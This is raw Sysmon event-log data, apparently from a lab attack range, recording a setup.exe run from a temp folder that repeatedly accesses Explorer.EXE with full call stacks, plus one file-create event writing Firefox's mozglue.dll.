13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\mozglue.dll2021-01-18 13:59:52.427 10341000x800000000000000015100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 